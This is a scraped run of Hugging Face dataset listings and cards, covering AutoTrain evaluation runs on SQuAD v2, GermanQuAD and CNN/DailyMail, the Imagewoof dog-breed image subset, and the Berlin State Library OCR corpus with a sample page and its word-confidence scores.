#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
[More Information Needed]
### Contributions
Thanks to [@github-username](https://github.com/mustaszewski) for adding this dataset.
| muibk/wmt19_metrics_task | [
"task_categories:translation",
"annotations_creators:expert-generated",
"language_creators:found",
"language_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:translation",
"size_categories:100K<n<1M",
"license:unknown",
"region:us"
] | 2022-07-26T06:21:28+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["found", "machine-generated", "expert-generated"], "language": ["de-cs", "de-en", "de-fr", "en-cs", "en-de", "en-fi", "en-gu", "en-kk", "en-lt", "en-ru", "en-zh", "fi-en", "fr-de", "gu-en", "kk-en", "lt-en", "ru-en", "zh-en"], "license": ["unknown"], "multilinguality": ["translation"], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["translation"], "task_ids": [], "pretty_name": "WMT19 Metrics Shared Task"} | 2022-07-26T09:06:23+00:00 |
38e21f35965ee9f983839b416930aa3429ac60a5 | Achen/large-test | [
"license:bsd-2-clause",
"region:us"
] | 2022-07-26T07:09:21+00:00 | {"license": "bsd-2-clause"} | 2022-07-27T01:39:08+00:00 |
|
53514cd2b8c3bccdde0a61348e5ef76d3a6748a6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855583 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/electra-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:48+00:00 |
696f9a3028e982a43e69283dab450a4be0e0f72e | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855584 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:41+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinybert-6l-768d-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:20+00:00 |
55b89a23287e3762d16ad2ed49412c4dbb00d49a | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855585 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-base-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:49+00:00 |
e5c897042bb83fe95d7f687c51d48ed06f2b55a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855586 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:51+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-medium-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:27+00:00 |
425e4ccec0605e663e762c5a088dcc5c6884329b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855587 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:57+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:21:10+00:00 |
052d2a9b78958a0f77a54fb5689aec9bc6827eb4 | jordane95/msmarco-passage-with-query | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T07:25:24+00:00 | {"license": "afl-3.0"} | 2023-03-01T09:13:35+00:00 |
|
c68710dd4a69eca02807018e4e93a4211b68c86a | jordane95/msmarco-passage-corpus-with-query | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T07:30:52+00:00 | {"license": "afl-3.0"} | 2022-07-27T01:02:45+00:00 |
|
2da7b5117419f7bd56e09b02442fed0c5c2e934a | mingz/demo | [
"region:us"
] | 2022-07-26T09:55:03+00:00 | {} | 2022-07-26T09:55:21+00:00 |
|
b9a7ed6dcfa2236fcfd4cc28fd129f5642ddf89d | asparius/demirtas-movie | [
"license:mit",
"region:us"
] | 2022-07-26T10:39:08+00:00 | {"license": "mit"} | 2022-07-26T10:56:21+00:00 |
|
dc2f783401fca4dc3c2fd7dd2b3b54892ca65332 | frogvre/lgo1 | [
"license:unknown",
"region:us"
] | 2022-07-26T13:20:16+00:00 | {"license": "unknown"} | 2022-07-26T13:20:16+00:00 |
|
0d81b9869910b53d9fac2bddf8d3e2eb2afe8a50 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875589 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:50+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-base-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:30+00:00 |
0b848ff3c9d5c4d515e9fea94415453bc756d489 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875590 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-large-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:57+00:00 |
8c73891571e4da2fe888c7e9ed21167402492e59 | Achen/voc-test | [
"license:bsd",
"region:us"
] | 2022-07-26T14:12:11+00:00 | {"license": "bsd"} | 2022-07-27T02:24:17+00:00 |
|
8dc1bdb0cbe71fea85bb3a4f14c2c1b57c61d88f |
# Dataset Card for Imagewoof
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://github.com/fastai/imagenette#imagewoof
- **Repository:** https://github.com/fastai/imagenette
- **Leaderboard:** https://paperswithcode.com/sota/image-classification-on-imagewoof
### Dataset Summary
A smaller subset of 10 classes from [Imagenet](https://huggingface.co/datasets/imagenet-1k#dataset-summary) that aren't so easy to classify, since they're all dog breeds.
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward), and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.
### Supported Tasks and Leaderboards
- `image-classification`: The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
## Dataset Structure
### Data Instances
A data point comprises an image URL and its classification label.
```
{
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=320x320 at 0x19FA12186D8>,
'label': 'Beagle',
}
```
### Data Fields
- `image`: A `PIL.Image.Image` object containing the image.
- `label`: the expected class label of the image.
### Data Splits
| |train|validation|
|---------|----:|---------:|
|imagewoof| 9025| 3929|
## Dataset Creation
### Curation Rationale
cf. https://huggingface.co/datasets/imagenet-1k#curation-rationale
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of [ImageNet](https://huggingface.co/datasets/imagenet-1k). Information about data collection of the source data can be found [here](https://huggingface.co/datasets/imagenet-1k#initial-data-collection-and-normalization).
### Annotations
#### Annotation process
cf. https://huggingface.co/datasets/imagenet-1k#annotation-process
#### Who are the annotators?
cf. https://huggingface.co/datasets/imagenet-1k#who-are-the-annotators
### Personal and Sensitive Information
cf. https://huggingface.co/datasets/imagenet-1k#personal-and-sensitive-information
## Considerations for Using the Data
### Social Impact of Dataset
cf. https://huggingface.co/datasets/imagenet-1k#social-impact-of-dataset
### Discussion of Biases
cf. https://huggingface.co/datasets/imagenet-1k#discussion-of-biases
### Other Known Limitations
cf. https://huggingface.co/datasets/imagenet-1k#other-known-limitations
## Additional Information
### Dataset Curators
cf. https://huggingface.co/datasets/imagenet-1k#dataset-curators
and Jeremy Howard
### Licensing Information
[Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0).
### Citation Information
```
@software{Howard_Imagewoof_2019,
title={Imagewoof: a subset of 10 classes from Imagenet that aren't so easy to classify},
author={Jeremy Howard},
year={2019},
month={March},
publisher = {GitHub},
url = {https://github.com/fastai/imagenette#imagewoof}
}
```
### Contributions
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward) and published on [Github](https://github.com/fastai/imagenette). It was then only integrated into HuggingFace Datasets by [@frgfm](https://huggingface.co/frgfm).
| frgfm/imagewoof | [
"task_categories:image-classification",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"size_categories:1K<n<10K",
"source_datasets:extended",
"language:en",
"license:apache-2.0",
"region:us"
] | 2022-07-26T14:21:56+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["extended"], "task_categories": ["image-classification"], "task_ids": [], "paperswithcode_id": "imagewoof", "pretty_name": "Imagewoof"} | 2022-12-11T22:26:18+00:00 |
3f80d82f04e37d40b5972c5fcc5bb0e7c7830e76 | robertmyers/convo_base | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T14:56:10+00:00 | {"license": "afl-3.0"} | 2022-07-26T14:56:10+00:00 |
|
a0d9ca0b1c481c4e8b2100bb6eb0457559e3f508 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: Graphcore/roberta-base-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@Narayana](https://huggingface.co/Narayana) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-47db8743-11885591 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T15:36:22+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "Graphcore/roberta-base-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T15:38:56+00:00 |
7c7d48c7cf5047d41d499131f6e3e5d57fc8abe5 | naem1023/final_aug_2000 | [
"license:afl-3.0",
"region:us"
] | 2022-07-26T16:51:47+00:00 | {"license": "afl-3.0"} | 2022-07-26T16:52:12+00:00 |
|
2eb12757b146d9c1fbfda4e8f8d4a10c520de326 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-12-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895592 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:58:47+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-12-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:52:05+00:00 |
9acbc0b433d326333ebec9838d2cfd3dd96e4a6c | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: philschmid/distilbart-cnn-12-6-samsum
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895594 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T16:59:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "philschmid/distilbart-cnn-12-6-samsum", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:47:15+00:00 |
09f0a5fb1b4b7bb1b18dac3c50ceeeaae00969fe | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: sshleifer/distilbart-cnn-6-6
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-8f63e3f3-11895593 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T17:01:21+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "sshleifer/distilbart-cnn-6-6", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-07-26T17:34:27+00:00 |
a890935d5bd754ddc5b85f56b6f34f6d2bb4abba |
# Dataset Card for Berlin State Library OCR data
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:**
- **Repository:**
- **Paper:**
- **Leaderboard:**
- **Point of Contact:**
### Dataset Summary
> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.
> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.
For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).
### Supported Tasks and Leaderboards
- `language-modeling`: this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.
-
### Languages
The collection includes material across a large number of languages. The languages of the OCR text have been detected using [langid.py: An Off-the-shelf Language Identification Tool](https://aclanthology.org/P12-3005) (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. **Note:** not all examples may have been successfully matched to the language prediction table from the original data.
The frequency of the top ten languages in the dataset is shown below:
| | frequency |
|----|------------------|
| de | 3.20963e+06 |
| nl | 491322 |
| en | 473496 |
| fr | 216210 |
| es | 68869 |
| lb | 33625 |
| la | 27397 |
| pl | 17458 |
| it | 16012 |
| zh | 11971 |
[More Information Needed]
## Dataset Structure
### Data Instances
Each example represents a single page of OCR'd text.
A single example of the dataset is as follows:
```python
{'aut': 'Doré, Henri',
'date': '1912',
'file name': '00000218.xml',
'language': 'fr',
'language_confidence': 1.0,
'place': 'Chang-hai',
'ppn': '646426230',
'publisher': 'Imprimerie de la Mission Catholique',
'text': "— 338 — Cela fait, on enterre la statuette qu’on vient d’outrager, atten dant la réalisation sur la personne elle-même. C’est l’outrage en effigie. Un deuxième moyen, c’est de représenter l’Esprit Vengeur sous la figure d’un fier-à-bras, armé d’un sabre, ou d’une pique, et de lui confier tout le soin de sa vengeance. On multiplie les incantations et les offrandes en son honneur, pour le porter au paroxysme de la fureur, et inspirer à l’Esprit malin l’idée de l’exécution de ses désirs : en un mot, on fait tout pour faire passer en son cœur la rage de vengeance qui consume le sien propre. C’est une invention diabolique imaginée pour assouvir sa haine sur l’ennemi qu’on a en horreur. Ailleurs, ce n’est qu’une figurine en bois ou en papier, qui est lancée contre l’ennemi; elle se dissimule, ou prend des formes fantastiques pour acomplir son œuvre de vengeance. Qu’on se rappelle la panique qui régna dans la ville de Nan- king ifâ ffl, et ailleurs, l’année où de méchantes gens répandirent le bruit que des hommes de papier volaient en l’air et coupaient les tresses de cheveux des Chinois. Ce fut une véritable terreur, tous étaient affolés, et il y eut à cette occasion de vrais actes de sauvagerie. Voir historiettes sur les envoûtements : Wieger Folk-Lore, N os 50, 128, 157, 158, 159. Corollaire. Les Tao-niu jift fx ou femmes “ Tao-clie'’. A cette super stition peut se rapporter la pratique des magiciennes du Kiang- sou ■n: m, dans les environs de Chang-hai ± m, par exemple. Ces femmes portent constamment avec- elles une statue réputée merveilleuse : elle n’a que quatre ou cinq pouces de hauteur ordinairement. A force de prières, d’incantations, elles finissent par la rendre illuminée, vivante et parlante, ou plutôt piaillarde, car elle ne répond que par des petits cris aigus et répétés aux demandes qu’on lui adressé; elle paraît comme animée, sautille,",
'title': 'Les pratiques superstitieuses',
'wc': [1.0,
0.7266666889,
1.0,
0.9950000048,
0.7059999704,
0.5799999833,
0.7142857313,
0.7250000238,
0.9855555296,
0.6880000234,
0.7099999785,
0.7054545283,
1.0,
0.8125,
0.7950000167,
0.5681818128,
0.5500000119,
0.7900000215,
0.7662500143,
0.8830000162,
0.9359999895,
0.7411110997,
0.7950000167,
0.7962499857,
0.6949999928,
0.8937500119,
0.6299999952,
0.8820000291,
1.0,
0.6781818271,
0.7649999857,
0.437142849,
1.0,
1.0,
0.7416666746,
0.6474999785,
0.8166666627,
0.6825000048,
0.75,
0.7033333182,
0.7599999905,
0.7639999986,
0.7516666651,
1.0,
1.0,
0.5466666818,
0.7571428418,
0.8450000286,
1.0,
0.9350000024,
1.0,
1.0,
0.7099999785,
0.7250000238,
0.8588888645,
0.8366666436,
0.7966666818,
1.0,
0.9066666961,
0.7288888693,
1.0,
0.8333333135,
0.8787500262,
0.6949999928,
0.8849999905,
0.5816666484,
0.5899999738,
0.7922222018,
1.0,
1.0,
0.6657142639,
0.8650000095,
0.7674999833,
0.6000000238,
0.9737499952,
0.8140000105,
0.978333354,
1.0,
0.7799999714,
0.6650000215,
1.0,
0.823333323,
1.0,
0.9599999785,
0.6349999905,
1.0,
0.9599999785,
0.6025000215,
0.8525000215,
0.4875000119,
0.675999999,
0.8833333254,
0.6650000215,
0.7566666603,
0.6200000048,
0.5049999952,
0.4524999857,
1.0,
0.7711111307,
0.6666666865,
0.7128571272,
1.0,
0.8700000048,
0.6728571653,
1.0,
0.6800000072,
0.6499999762,
0.8259999752,
0.7662500143,
0.6725000143,
0.8362500072,
1.0,
0.6600000262,
0.6299999952,
0.6825000048,
0.7220000029,
1.0,
1.0,
0.6587499976,
0.6822222471,
1.0,
0.8339999914,
0.6449999809,
0.7062500119,
0.9150000215,
0.8824999928,
0.6700000167,
0.7250000238,
0.8285714388,
0.5400000215,
1.0,
0.7966666818,
0.7350000143,
0.6188889146,
0.6499999762,
1.0,
0.7459999919,
0.5799999833,
0.7480000257,
1.0,
0.9333333373,
0.790833354,
0.5550000072,
0.6700000167,
0.7766666412,
0.8280000091,
0.7250000238,
0.8669999838,
0.5899999738,
1.0,
0.7562500238,
1.0,
0.7799999714,
0.8500000238,
0.4819999933,
0.9350000024,
1.0,
0.8399999738,
0.7950000167,
1.0,
0.9474999905,
0.453333348,
0.6575000286,
0.9399999976,
0.6733333468,
0.8042857051,
0.7599999905,
1.0,
0.7355555296,
0.6499999762,
0.7118181586,
1.0,
0.621999979,
0.7200000286,
1.0,
0.853333354,
0.6650000215,
0.75,
0.7787500024,
1.0,
0.8840000033,
1.0,
0.851111114,
1.0,
0.9142857194,
1.0,
0.8899999857,
1.0,
0.9024999738,
1.0,
0.6166666746,
0.7533333302,
0.7766666412,
0.6637499928,
1.0,
0.8471428752,
0.7012500167,
0.6600000262,
0.8199999928,
1.0,
0.7766666412,
0.3899999857,
0.7960000038,
0.8050000072,
1.0,
0.8000000119,
0.7620000243,
1.0,
0.7163636088,
0.5699999928,
0.8849999905,
0.6166666746,
0.8799999952,
0.9058333039,
1.0,
0.6866666675,
0.7810000181,
0.3400000036,
0.2599999905,
0.6333333254,
0.6524999738,
0.4875000119,
0.7425000072,
0.75,
0.6863636374,
1.0,
0.8742856979,
0.137500003,
0.2099999934,
0.4199999869,
0.8216666579,
1.0,
0.7563636303,
0.3000000119,
0.8579999804,
0.6679999828,
0.7099999785,
0.7875000238,
0.9499999881,
0.5799999833,
0.9150000215,
0.6600000262,
0.8066666722,
0.729090929,
0.6999999881,
0.7400000095,
0.8066666722,
0.2866666615,
0.6700000167,
0.9225000143,
1.0,
0.7599999905,
0.75,
0.6899999976,
0.3600000143,
0.224999994,
0.5799999833,
0.8874999881,
1.0,
0.8066666722,
0.8985714316,
0.8827272654,
0.8460000157,
0.8880000114,
0.9533333182,
0.7966666818,
0.75,
0.8941666484,
1.0,
0.8450000286,
0.8666666746,
0.9533333182,
0.5883333087,
0.5799999833,
0.6549999714,
0.8600000143,
1.0,
0.7585714459,
0.7114285827,
1.0,
0.8519999981,
0.7250000238,
0.7437499762,
0.6639999747,
0.8939999938,
0.8877778053,
0.7300000191,
1.0,
0.8766666651,
0.8019999862,
0.8928571343,
1.0,
0.853333354,
0.5049999952,
0.5416666865,
0.7963636518,
0.5600000024,
0.8774999976,
0.6299999952,
0.5749999881,
0.8199999928,
0.7766666412,
1.0,
0.9850000143,
0.5674999952,
0.6240000129,
1.0,
0.9485714436,
1.0,
0.8174999952,
0.7919999957,
0.6266666651,
0.7887499928,
0.7825000286,
0.5366666913,
0.65200001,
0.832857132,
0.7488889098]}
```
### Data Fields
- 'file name': filename of the original XML file
- 'text': OCR'd text for that page of the item
- 'wc': the word confidence for each token predicted by the OCR engine
- 'ppn': 'Pica production numbers' an internal ID used by the library. See [](https://doi.org/10.5281/zenodo.2702544) for more details.
'language': language predicted by `langid.py` (see above for more details)
-'language_confidence': confidence score given by `langid.py`
- publisher: publisher of the item in which the text appears
- place: place of publication of the item in which the text appears
- date: date of the item in which the text appears
- title: title of the item in which the text appears
- aut: author of the item in which the text appears
[More Information Needed]
### Data Splits
This dataset contains only a single split `train`.
## Dataset Creation
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo.
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The [dataprep.ipynb](https://huggingface.co/datasets/biglam/berlin_state_library_ocr/blob/main/dataprep.ipynb) was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
- the CSV `xml2csv_alto.csv`, which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the `datasets` library
- this CSV was augmented with language information from `corpus-language.pkl` **note** some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information
- the CSV was further augmented by trying to map the PPN to fields in a metadata download created using [https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py](https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py). **note** not all examples are successfully matched to this metadata download.
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
- the confidence scores the OCR engines used to produce the full-text materials.
- the predicted languages and associated confidence scores produced by `langid.py`
The dataset also contains metadata for the following fields:
- author
- publisher
- the place of publication
- title
#### Who are the annotators?
[More Information Needed]
